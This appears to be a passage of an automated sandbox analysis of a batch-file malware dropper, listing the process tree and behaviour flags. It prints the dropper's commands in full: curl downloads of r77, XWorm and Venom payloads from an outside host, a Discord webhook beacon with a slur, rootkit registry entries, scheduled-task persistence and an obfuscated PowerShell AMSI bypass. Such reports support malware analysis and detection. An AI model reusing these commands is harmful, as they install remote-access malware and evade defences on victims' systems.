3448 Explorer.EXE

pid	process
3448	Explorer.EXE

pid	process
3448	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exe

description	pid	process	target process
PID 2196 wrote to memory of 3668	2196	cmd.exe	chcp.com
PID 2196 wrote to memory of 3668	2196	cmd.exe	chcp.com
PID 2196 wrote to memory of 3688	2196	cmd.exe	curl.exe
PID 2196 wrote to memory of 3688	2196	cmd.exe	curl.exe
PID 2196 wrote to memory of 4544	2196	cmd.exe	curl.exe
PID 2196 wrote to memory of 4544	2196	cmd.exe	curl.exe
PID 2196 wrote to memory of 1856	2196	cmd.exe	curl.exe
PID 2196 wrote to memory of 1856	2196	cmd.exe	curl.exe
PID 2196 wrote to memory of 3736	2196	cmd.exe	curl.exe
PID 2196 wrote to memory of 3736	2196	cmd.exe	curl.exe
PID 2196 wrote to memory of 3720	2196	cmd.exe	curl.exe
PID 2196 wrote to memory of 3720	2196	cmd.exe	curl.exe
PID 2196 wrote to memory of 2256	2196	cmd.exe	curl.exe
PID 2196 wrote to memory of 2256	2196	cmd.exe	curl.exe
PID 2196 wrote to memory of 4160	2196	cmd.exe	cmd.exe
PID 2196 wrote to memory of 4160	2196	cmd.exe	cmd.exe
PID 2196 wrote to memory of 720	2196	cmd.exe	reg.exe
PID 2196 wrote to memory of 720	2196	cmd.exe	reg.exe
PID 2196 wrote to memory of 4140	2196	cmd.exe	cmd.exe
PID 2196 wrote to memory of 4140	2196	cmd.exe	cmd.exe
PID 2196 wrote to memory of 5016	2196	cmd.exe	reg.exe
PID 2196 wrote to memory of 5016	2196	cmd.exe	reg.exe
PID 2196 wrote to memory of 2928	2196	cmd.exe	cmd.exe
PID 2196 wrote to memory of 2928	2196	cmd.exe	cmd.exe
PID 2196 wrote to memory of 2792	2196	cmd.exe	reg.exe
PID 2196 wrote to memory of 2792	2196	cmd.exe	reg.exe
PID 2196 wrote to memory of 1660	2196	cmd.exe	cmd.exe
PID 2196 wrote to memory of 1660	2196	cmd.exe	cmd.exe
PID 2196 wrote to memory of 1984	2196	cmd.exe	reg.exe
PID 2196 wrote to memory of 1984	2196	cmd.exe	reg.exe
PID 2196 wrote to memory of 4220	2196	cmd.exe	cmd.exe
PID 2196 wrote to memory of 4220	2196	cmd.exe	cmd.exe
PID 2196 wrote to memory of 2648	2196	cmd.exe	reg.exe
PID 2196 wrote to memory of 2648	2196	cmd.exe	reg.exe
PID 2196 wrote to memory of 2248	2196	cmd.exe	cmd.exe
PID 2196 wrote to memory of 2248	2196	cmd.exe	cmd.exe
PID 2196 wrote to memory of 2628	2196	cmd.exe	reg.exe
PID 2196 wrote to memory of 2628	2196	cmd.exe	reg.exe
PID 2196 wrote to memory of 4824	2196	cmd.exe	cmd.exe
PID 2196 wrote to memory of 4824	2196	cmd.exe	cmd.exe
PID 2196 wrote to memory of 1964	2196	cmd.exe	reg.exe
PID 2196 wrote to memory of 1964	2196	cmd.exe	reg.exe
PID 2196 wrote to memory of 3284	2196	cmd.exe	cmd.exe
PID 2196 wrote to memory of 3284	2196	cmd.exe	cmd.exe
PID 2196 wrote to memory of 4764	2196	cmd.exe	reg.exe
PID 2196 wrote to memory of 4764	2196	cmd.exe	reg.exe
PID 2196 wrote to memory of 380	2196	cmd.exe	cmd.exe
PID 2196 wrote to memory of 380	2196	cmd.exe	cmd.exe
PID 2196 wrote to memory of 2932	2196	cmd.exe	reg.exe
PID 2196 wrote to memory of 2932	2196	cmd.exe	reg.exe
PID 2196 wrote to memory of 2704	2196	cmd.exe	cmd.exe
PID 2196 wrote to memory of 2704	2196	cmd.exe	cmd.exe
PID 2196 wrote to memory of 4428	2196	cmd.exe	reg.exe
PID 2196 wrote to memory of 4428	2196	cmd.exe	reg.exe
PID 2196 wrote to memory of 4260	2196	cmd.exe	cmd.exe
PID 2196 wrote to memory of 4260	2196	cmd.exe	cmd.exe
PID 2196 wrote to memory of 1084	2196	cmd.exe	reg.exe
PID 2196 wrote to memory of 1084	2196	cmd.exe	reg.exe
PID 2196 wrote to memory of 4852	2196	cmd.exe	cmd.exe
PID 2196 wrote to memory of 4852	2196	cmd.exe	cmd.exe
PID 2196 wrote to memory of 3168	2196	cmd.exe	reg.exe
PID 2196 wrote to memory of 3168	2196	cmd.exe	reg.exe
PID 2196 wrote to memory of 316	2196	cmd.exe	cmd.exe
PID 2196 wrote to memory of 316	2196	cmd.exe	cmd.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:624

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
PID:332

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{4247497e-60c2-4946-964f-5acab6e07f1d}
2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1248

C:\Windows\Resources\$77-penisware2.exe
"C:\Windows\Resources\$77-penisware2.exe"
3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4568

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:680

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:956

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:740

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1048

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1072

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1104

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1216

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1252

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
2⤵
PID:3012

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:eBFjXoIklMKS{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$dEHOxpOdHeSoHD,[Parameter(Position=1)][Type]$fAzKtQNxLl)$jrnpPcWKVgx=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+''+'f'+'l'+[Char](101)+'c'+'t'+''+[Char](101)+''+[Char](100)+''+'D'+''+'e'+''+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'nM'+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+''+[Char](121)+''+'M'+'o'+[Char](100)+'u'+'l'+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+'eg'+'a'+''+[Char](116)+''+[Char](101)+''+'T'+'y'+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+'c'+','+'S'+'e'+''+[Char](97)+''+'l'+''+'e'+'d'+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+'i'+'C'+[Char](108)+'ass,'+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+'C'+[Char](108)+''+[Char](97)+''+'s'+''+'s'+'',[MulticastDelegate]);$jrnpPcWKVgx.DefineConstructor('RT'+[Char](83)+''+[Char](112)+''+[Char](101)+''+'c'+''+'i'+''+[Char](97)+''+'l'+''+'N'+''+[Char](97)+''+'m'+''+'e'+''+','+''+[Char](72)+''+'i'+''+'d'+''+'e'+'B'+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+'P'+[Char](117)+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$dEHOxpOdHeSoHD).SetImplementationFlags('R'+[Char](117)+'n'+[Char](116)+''+'i'+'m'+[Char](101)+','+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');$jrnpPcWKVgx.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+'ok'+'e'+'',''+[Char](80)+'ub'+'l'+''+'i'+''+'c'+''+[Char](44)+''+'H'+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+'ig'+[Char](44)+''+[Char](78)+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+''+'o'+''+[Char](116)+','+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+'',$fAzKtQNxLl,$dEHOxpOdHeSoHD).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+'t'+'i'+[Char](109)+'e,M'+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $jrnpPcWKVgx.CreateType();}$hFammRwMomHIz=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+[Char](116)+''+'e'+''+[Char](109)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType('M'+'i'+''+[Char](99)+'ro'+[Char](115)+''+'o'+''+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+'i'+'n'+''+[Char](51)+''+[Char](50)+'.'+'U'+''+[Char](110)+''+[Char](115)+'af'+[Char](101)+''+[Char](78)+''+'a'+'t'+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+[Char](104)+'o'+[Char](100)+''+[Char](115)+'');$avSqRVfJHBWvtC=$hFammRwMomHIz.GetMethod('G'+[Char](101)+'t'+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+'d'+'r'+''+[Char](101)+'ss',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+'i'+''+[Char](99)+','+[Char](83)+'t'+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ZocmQcgcxhYHwQjJMyd=eBFjXoIklMKS @([String])([IntPtr]);$XJurVsugkzpGictZFgyMoA=eBFjXoIklMKS @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$kRCAnplTszH=$hFammRwMomHIz.GetMethod(''+[Char](71)+'e'+[Char](116)+''+[Char](77)+'o'+[Char](100)+'u'+'l'+''+[Char](101)+''+[Char](72)+'a'+[Char](110)+'d'+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+'3'+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$EKFqMNxZzHmxcu=$avSqRVfJHBWvtC.Invoke($Null,@([Object]$kRCAnplTszH,[Object]('L'+[Char](111)+''+[Char](97)+''+'d'+''+[Char](76)+''+[Char](105)+''+'b'+''+'r'+''+[Char](97)+'ry'+'A'+'')));$aBaNcVzUiQjIZLLlw=$avSqRVfJHBWvtC.Invoke($Null,@([Object]$kRCAnplTszH,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+'u'+''+[Char](97)+''+'l'+''+[Char](80)+''+'r'+''+'o'+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+'t'+'')));$yjPEzBF=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EKFqMNxZzHmxcu,$ZocmQcgcxhYHwQjJMyd).Invoke('ams'+[Char](105)+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'');$cbXIAYCrMTblaqXuD=$avSqRVfJHBWvtC.Invoke($Null,@([Object]$yjPEzBF,[Object](''+[Char](65)+'m'+[Char](115)+''+'i'+''+'S'+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+'B'+''+[Char](117)+''+[Char](102)+'f'+'e'+'r')));$hWZFKfLNLW=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($aBaNcVzUiQjIZLLlw,$XJurVsugkzpGictZFgyMoA).Invoke($cbXIAYCrMTblaqXuD,[uint32]8,4,[ref]$hWZFKfLNLW);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$cbXIAYCrMTblaqXuD,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($aBaNcVzUiQjIZLLlw,$XJurVsugkzpGictZFgyMoA).Invoke($cbXIAYCrMTblaqXuD,[uint32]8,0x20,[ref]$hWZFKfLNLW);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'T'+[Char](87)+''+'A'+''+[Char](82)+''+'E'+'').GetValue(''+'$'+''+[Char](55)+''+[Char](55)+'s'+'t'+''+'a'+''+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4176

C:\Users\Admin\AppData\Roaming\$77-penisware.exe
C:\Users\Admin\AppData\Roaming\$77-penisware.exe
2⤵
- Executes dropped EXE
PID:3432

C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
2⤵
- Executes dropped EXE
PID:2124

C:\Users\Admin\AppData\Roaming\$77-penisware.exe
C:\Users\Admin\AppData\Roaming\$77-penisware.exe
2⤵
- Executes dropped EXE
PID:2484

C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
2⤵
- Executes dropped EXE
PID:4724

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1292

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1320

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1348

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1480

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1500

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1516

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1568

C:\Windows\system32\sihost.exe
sihost.exe
2⤵
PID:2896

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1632

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1696

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1724

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1800

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1824

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1912

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1924

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1952

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1996

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1712

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2080

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2160

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2404

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2412

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2496

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2552

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2560

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2592

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2608

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2636

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2904

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:3068

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3088

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3352

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of UnmapMainImage
PID:3448

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\dropper_1.bat"
2⤵
- Suspicious use of WriteProcessMemory
PID:2196

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:1688

C:\Windows\system32\chcp.com
chcp 65001
3⤵
PID:3668

C:\Windows\system32\curl.exe
C:\Windows\system32\curl "https://discord.com/api/webhooks/1250147812503584798/kM-golxLeBjZkcQMdjxFBJ8cEzMjI9zUI-ekNo5GaP0xIAPrgIM71FdqGQFE9zwSksRt" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""@everyone"",""embeds"":[{""title"":""Loader Was Ran By Admin!"",""color"":16711680,""author"":{""name"":""Sexy Niggas""},""footer"":{""text"":""UD Loader - Mon 06/17/2024 21:33:03.41""}}],""username"":""UD Loader"",""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
3⤵
PID:3688

C:\Windows\system32\curl.exe
C:\Windows\system32\curl "https://penisware.com/r77/Install.exe" --output "C:\Windows\Resources\$77-install.exe"
3⤵
- Drops file in Windows directory
PID:4544

C:\Windows\system32\curl.exe
C:\Windows\system32\curl https://penisware.com/xworm/sdchost.exe --output C:\Windows\Resources\$77-sdchost.exe
3⤵
- Drops file in Windows directory
PID:1856

C:\Windows\system32\curl.exe
C:\Windows\system32\curl https://penisware.com/venom/scchost.exe --output C:\Windows\Resources\$77-scchost.exe
3⤵
- Drops file in Windows directory
PID:3736

C:\Windows\system32\curl.exe
C:\Windows\system32\curl https://penisware.com/xworm/penisware-gold.exe --output C:\Windows\Resources\$77-penisware.exe
3⤵
- Drops file in Windows directory
PID:3720

C:\Windows\system32\curl.exe
C:\Windows\system32\curl https://penisware.com/venom/penisware2.exe --output C:\Windows\Resources\$77-penisware2.exe
3⤵
- Drops file in Windows directory
PID:2256

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y "
3⤵
PID:4160

C:\Windows\system32\reg.exe
C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\paths /v wow /d C:\Windows\Resources\$77-sdchost.exe
3⤵
PID:720

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y "
3⤵
PID:4140

C:\Windows\system32\reg.exe
C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\process_names /v wow /d $77-sdchost.exe
3⤵
PID:5016

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y "
3⤵
PID:2928

C:\Windows\system32\reg.exe
C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\startup /v wow /d C:\Windows\Resources\$77-sdchost.exe
3⤵
PID:2792

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y "
3⤵
PID:1660

C:\Windows\system32\reg.exe
C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\paths /v wow /d C:\Windows\Resources\$77-scchost.exe
3⤵
PID:1984

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y "
3⤵
PID:4220

C:\Windows\system32\reg.exe
C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\process_names /v wow /d $77-scchost.exe
3⤵
PID:2648

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y "
3⤵
PID:2248

C:\Windows\system32\reg.exe
C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\startup /v wow /d C:\Windows\Resources\$77-scchost.exe
3⤵
PID:2628

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y "
3⤵
PID:4824

C:\Windows\system32\reg.exe
C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\paths /v wow /d C:\Windows\Resources\$77-penisware.exe
3⤵
PID:1964

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y "
3⤵
PID:3284

C:\Windows\system32\reg.exe
C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\process_names /v wow /d $77-penisware.exe
3⤵
PID:4764

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y "
3⤵
PID:380

C:\Windows\system32\reg.exe
C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\startup /v wow /d C:\Windows\Resources\$77-penisware.exe
3⤵
PID:2932

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y "
3⤵
PID:2704

C:\Windows\system32\reg.exe
C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\paths /v wow /d C:\Windows\Resources\$77-penisware2.exe
3⤵
PID:4428

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y "
3⤵
PID:4260

C:\Windows\system32\reg.exe
C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\process_names /v wow /d $77-penisware2.exe
3⤵
PID:1084

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y "
3⤵
PID:4852

C:\Windows\system32\reg.exe
C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\startup /v wow /d C:\Windows\Resources\$77-penisware2.exe
3⤵
PID:3168

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y "
3⤵
PID:316

C:\Windows\system32\reg.exe
C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\paths /v wow /d C:\Windows\Resources\$77-install.exe
3⤵
PID:4476

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y "
3⤵
PID:8

C:\Windows\system32\reg.exe
C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\process_names /v wow /d $77-install.exe
3⤵
PID:1328

C:\Windows\Resources\$77-sdchost.exe
"C:\Windows\Resources\$77-sdchost.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:464

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-scchost" /tr "C:\Users\Admin\AppData\Roaming\$77-scchost.exe"
4⤵
- Creates scheduled task(s)
PID:748

C:\Windows\Resources\$77-scchost.exe
"C:\Windows\Resources\$77-scchost.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5012

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-sachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-sachost.exe"' & exit
4⤵
PID:4732

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "$77-sachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-sachost.exe"'
5⤵
- Creates scheduled task(s)
PID:5080

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp4DE1.tmp.bat""
4⤵
PID:3204

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:4444

C:\Windows\system32\timeout.exe
timeout 3
5⤵
- Delays execution with timeout.exe
PID:4924

C:\Windows\Resources\$77-penisware.exe
"C:\Windows\Resources\$77-penisware.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3988

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-penisware" /tr "C:\Users\Admin\AppData\Roaming\$77-penisware.exe"
4⤵
- Creates scheduled task(s)
PID:964

C:\Windows\Resources\$77-penisware2.exe
"C:\Windows\Resources\$77-penisware2.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3104

C:\Windows\system32\timeout.exe
timeout 2
3⤵
- Delays execution with timeout.exe
PID:3728

C:\Windows\Resources\$77-install.exe
"C:\Windows\Resources\$77-install.exe"
3⤵
- Executes dropped EXE
PID:632

C:\Windows\regedit.exe
"C:\Windows\regedit.exe"
2⤵
- Runs regedit.exe
- Suspicious behavior: GetForegroundWindowSpam
PID:4624

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3640

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3844

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
PID:4020

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Checks SCSI registry key(s)
- Modifies registry class
PID:4252

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:376

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:2292

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:2304

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:1420

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:2712

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:540

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
